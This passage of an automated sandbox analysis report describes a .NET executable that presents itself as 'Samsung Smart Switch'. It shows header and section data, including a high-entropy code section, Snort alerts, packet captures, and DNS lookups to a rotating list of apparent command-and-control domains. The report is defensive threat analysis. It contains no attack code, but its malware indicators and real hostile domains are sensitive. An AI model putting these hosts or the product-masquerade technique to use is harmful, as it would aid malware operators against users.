                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1376400x4b.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x3d0.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x13a0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x1356940x135800False0.590645193861data7.30520133301IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x1380000x3d00x400False0.3935546875data3.18994060341IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x13a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_VERSION0x1380580x378data

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyrightCopyright Samsung Group
                                                                                Assembly Version4.2.20072.4
                                                                                InternalNames.exe
                                                                                FileVersion4.2.20072.4
                                                                                CompanyNameSamsung Group
                                                                                LegalTrademarks
                                                                                Comments
                                                                                ProductNameSamsung Smart Switch
                                                                                ProductVersion4.2.20072.4
                                                                                FileDescriptionSamsung Smart Switch
                                                                                OriginalFilenames.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                11/21/20-09:23:33.695125TCP1201ATTACK-RESPONSES 403 Forbidden804974734.102.136.180192.168.2.5
                                                                                11/21/20-09:24:22.422576TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.5
                                                                                11/21/20-09:24:33.074023TCP1201ATTACK-RESPONSES 403 Forbidden804975834.102.136.180192.168.2.5
                                                                                11/21/20-09:24:38.388168TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.5

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 21, 2020 09:22:33.260705948 CET49720443192.168.2.5104.42.151.234
                                                                                Nov 21, 2020 09:22:53.097776890 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.097862959 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.134103060 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.137559891 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.173620939 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.173751116 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.174362898 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.211704016 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.211775064 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.211826086 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.211858988 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.211911917 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.211981058 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.217577934 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.254484892 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.255224943 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.255281925 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.277554989 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277585030 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277607918 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277630091 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277651072 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277668953 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.277669907 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277690887 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.277690887 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277717113 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277730942 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.277740002 CET4434969520.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.277792931 CET49695443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.291327000 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.291438103 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.343966007 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433021069 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433052063 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433072090 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433095932 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433118105 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433146954 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.433171034 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433191061 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.433204889 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433224916 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433233976 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.433257103 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433281898 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.481157064 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:23:15.893409967 CET44349709104.79.89.181192.168.2.5
                                                                                Nov 21, 2020 09:23:15.893455029 CET44349709104.79.89.181192.168.2.5
                                                                                Nov 21, 2020 09:23:15.893728018 CET49709443192.168.2.5104.79.89.181
                                                                                Nov 21, 2020 09:23:16.834300041 CET804968093.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:16.834589005 CET4968080192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.156352997 CET4968680192.168.2.584.53.167.113
                                                                                Nov 21, 2020 09:23:17.173095942 CET804968684.53.167.113192.168.2.5
                                                                                Nov 21, 2020 09:23:17.173181057 CET4968680192.168.2.584.53.167.113
                                                                                Nov 21, 2020 09:23:17.402542114 CET804967893.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:17.402818918 CET4967880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.780802965 CET4969880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.797017097 CET804969893.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:17.797126055 CET4969880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.182488918 CET49704443192.168.2.540.67.254.36
                                                                                Nov 21, 2020 09:23:18.218991041 CET4434970440.67.254.36192.168.2.5
                                                                                Nov 21, 2020 09:23:18.246812105 CET804967993.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:18.246939898 CET4967980192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.264447927 CET49704443192.168.2.540.67.254.36
                                                                                Nov 21, 2020 09:23:18.661657095 CET49705443192.168.2.5204.79.197.200
                                                                                Nov 21, 2020 09:23:18.661828041 CET4970880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.661988020 CET49706443192.168.2.5204.79.197.200
                                                                                Nov 21, 2020 09:23:19.009052992 CET804969993.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:19.009216070 CET4969980192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:19.443249941 CET49709443192.168.2.5104.79.89.181
                                                                                Nov 21, 2020 09:23:19.443615913 CET4971080192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:22.889450073 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.905661106 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.907377005 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.907758951 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.923935890 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924204111 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924357891 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924613953 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.924678087 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.947079897 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:28.134789944 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.310134888 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.311305046 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.311546087 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.488259077 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490438938 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490461111 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490744114 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.491008043 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.666471004 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:33.563186884 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.579900980 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.579996109 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.580173016 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.596736908 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.695125103 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.695177078 CET804974734.102.136.180192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 21, 2020 09:22:38.956687927 CET4999253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:38.994410992 CET53499928.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:45.375660896 CET6007553192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:45.402854919 CET53600758.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:46.455682039 CET5501653192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:46.482789040 CET53550168.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:47.314817905 CET6434553192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:47.341952085 CET53643458.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:48.419157982 CET5712853192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:48.446239948 CET53571288.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:50.595700026 CET5479153192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:50.622940063 CET53547918.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:51.953351974 CET5046353192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:51.980514050 CET53504638.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:22:53.604816914 CET5039453192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:22:53.631861925 CET53503948.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:15.479948997 CET5853053192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:15.532522917 CET53585308.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:18.213177919 CET5381353192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:18.248826027 CET53538138.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:18.422950029 CET6373253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:18.458712101 CET53637328.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:18.531532049 CET5734453192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:18.567003012 CET53573448.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:19.925831079 CET5445053192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:19.953804970 CET53544508.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:22.456265926 CET5926153192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:22.507450104 CET53592618.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:22.830262899 CET5715153192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:22.877538919 CET53571518.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:25.220252037 CET5941353192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:25.257458925 CET53594138.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:27.941052914 CET6051653192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:28.133266926 CET53605168.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:33.503963947 CET5164953192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:33.561815023 CET53516498.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:38.743644953 CET6508653192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:38.790599108 CET53650868.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:44.261045933 CET5643253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:44.335588932 CET53564328.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:49.385682106 CET5292953192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:49.425587893 CET53529298.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:54.665210009 CET6431753192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:54.881589890 CET6100453192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:23:54.908885002 CET53610048.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:23:55.013375998 CET53643178.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:00.443555117 CET5689553192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:00.489475965 CET53568958.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:05.758873940 CET6237253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:05.805286884 CET53623728.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:10.843276024 CET6151553192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:10.885566950 CET53615158.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:16.247052908 CET5667553192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:16.574513912 CET53566758.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:22.247894049 CET5717253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:22.287492037 CET53571728.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:27.463037014 CET5526753192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:27.507025957 CET53552678.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:32.888231039 CET5096953192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:32.940440893 CET53509698.8.8.8192.168.2.5
                                                                                Nov 21, 2020 09:24:38.092770100 CET6436253192.168.2.58.8.8.8
                                                                                Nov 21, 2020 09:24:38.254417896 CET53643628.8.8.8192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Nov 21, 2020 09:23:22.456265926 CET192.168.2.58.8.8.80x31efStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:22.830262899 CET192.168.2.58.8.8.80x7901Standard query (0)www.ariasu-nakanokaikei.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:27.941052914 CET192.168.2.58.8.8.80x46f5Standard query (0)www.allan-wren.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:33.503963947 CET192.168.2.58.8.8.80xa6Standard query (0)www.theoutdoorbed.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:38.743644953 CET192.168.2.58.8.8.80xe18cStandard query (0)www.sweetbasilmarketing.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:44.261045933 CET192.168.2.58.8.8.80x838bStandard query (0)www.pasumaisangam.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:49.385682106 CET192.168.2.58.8.8.80x4987Standard query (0)www.justsoldbykristen.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:54.665210009 CET192.168.2.58.8.8.80x9b7fStandard query (0)www.lotoencasa.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.443555117 CET192.168.2.58.8.8.80xa07dStandard query (0)www.guidesgold.netA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:05.758873940 CET192.168.2.58.8.8.80xa0ecStandard query (0)www.indorebodybilaspur.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.843276024 CET192.168.2.58.8.8.80xeebfStandard query (0)www.thoughtslate.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:16.247052908 CET192.168.2.58.8.8.80x3a8bStandard query (0)www.chemtradent.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:22.247894049 CET192.168.2.58.8.8.80xfd93Standard query (0)www.erpsystem.siteA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:27.463037014 CET192.168.2.58.8.8.80xfd85Standard query (0)www.forbigdogs.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:32.888231039 CET192.168.2.58.8.8.80x88b2Standard query (0)www.rockinglifefromhome.comA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:38.092770100 CET192.168.2.58.8.8.80x7179Standard query (0)www.allmm.infoA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Nov 21, 2020 09:23:22.507450104 CET8.8.8.8192.168.2.50x31efNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:23:22.877538919 CET8.8.8.8192.168.2.50x7901No error (0)www.ariasu-nakanokaikei.com13.224.93.48A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:22.877538919 CET8.8.8.8192.168.2.50x7901No error (0)www.ariasu-nakanokaikei.com13.224.93.90A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:22.877538919 CET8.8.8.8192.168.2.50x7901No error (0)www.ariasu-nakanokaikei.com13.224.93.97A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:22.877538919 CET8.8.8.8192.168.2.50x7901No error (0)www.ariasu-nakanokaikei.com13.224.93.64A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:28.133266926 CET8.8.8.8192.168.2.50x46f5No error (0)www.allan-wren.com104.161.26.87A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:33.561815023 CET8.8.8.8192.168.2.50xa6No error (0)www.theoutdoorbed.comtheoutdoorbed.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:23:33.561815023 CET8.8.8.8192.168.2.50xa6No error (0)theoutdoorbed.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:38.790599108 CET8.8.8.8192.168.2.50xe18cNo error (0)www.sweetbasilmarketing.comsweetbasilmarketing.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:23:38.790599108 CET8.8.8.8192.168.2.50xe18cNo error (0)sweetbasilmarketing.com185.201.11.126A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:44.335588932 CET8.8.8.8192.168.2.50x838bNo error (0)www.pasumaisangam.com3.127.175.50A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:49.425587893 CET8.8.8.8192.168.2.50x4987No error (0)www.justsoldbykristen.com52.71.133.130A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:23:55.013375998 CET8.8.8.8192.168.2.50x9b7fNo error (0)www.lotoencasa.com192.155.168.14A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)www.guidesgold.netparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:00.489475965 CET8.8.8.8192.168.2.50xa07dNo error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:05.805286884 CET8.8.8.8192.168.2.50xa0ecServer failure (2)www.indorebodybilaspur.comnonenoneA (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)www.thoughtslate.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:10.885566950 CET8.8.8.8192.168.2.50xeebfNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:16.574513912 CET8.8.8.8192.168.2.50x3a8bNo error (0)www.chemtradent.com45.194.171.26A (IP address)IN (0x0001)
